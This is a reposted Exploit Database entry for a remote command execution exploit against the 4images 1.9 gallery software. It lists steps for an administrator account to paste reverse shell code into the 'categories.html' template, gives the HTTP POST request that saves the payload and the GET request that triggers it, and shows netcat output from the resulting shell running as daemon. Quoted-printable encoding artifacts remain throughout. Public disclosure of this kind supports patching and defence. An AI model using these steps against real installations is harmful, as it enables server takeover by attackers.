4images 1.9 – Remote Command Execution (RCE)

• Exploit Database
• 16 阅读

• 作者： Andrey Stoykov
  日期： 2023-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51147/

• # Exploit Title: 4images 1.9 - Remote Command Execution (RCE)
  # Exploit Author: Andrey Stoykov
  # Software Link: https://www.4homepages.de/download-4images
  # Version: 1.9
  # Tested on: Ubuntu 20.04
  
  
  To reproduce do the following:
  
  1. Login as administrator user
  2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "d=
  efault_960px" -> "Load Theme"
  3. Select Template "categories.html"
  4. Paste reverse shell code
  5. Click "Save Changes"
  6. Browse to "http://host/4images/categories.php?cat_id=3D1"
  
  
  // HTTP POST request showing reverse shell payload
  
  POST /4images/admin/templates.php HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
  101 Firefox/100.0
  [...]
  
  __csrf=3Dc39b7dea0ff15442681362d2a583c7a9&action=3Dsavetemplate&content=3D[=
  REVERSE_SHELL_CODE]&template_file_name=3Dcategories.html&template_folder=3D=
  default_960px[...]
  
  
  
  // HTTP redirect response to specific template
  
  GET /4images/categories.php?cat_id=3D1 HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
  101 Firefox/100.0
  [...]
  
  
  # nc -kvlp 4444
  listening on [any] 4444 ...
  connect to [127.0.0.1] from localhost [127.0.0.1] 43032
  Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (20=
  22-11-07) x86_64 GNU/Linux
   13:54:28 up2:18,2 users,load average: 0.09, 0.68, 0.56
  USER TTYFROM LOGIN@ IDLE JCPU PCPU WHAT
  kali tty7 :0 11:582:18m2:21 0.48s xfce4-sessi=
  on
  kali pts/1-11:581:4024.60s0.14s sudo su
  uid=3D1(daemon) gid=3D1(daemon) groups=3D1(daemon)
  /bin/sh: 0: can't access tty; job control turned off
  $=20
  
  
  
  
  
  --sgnirk-7d26becc-c589-46c6-a348-fe09d4b162fe--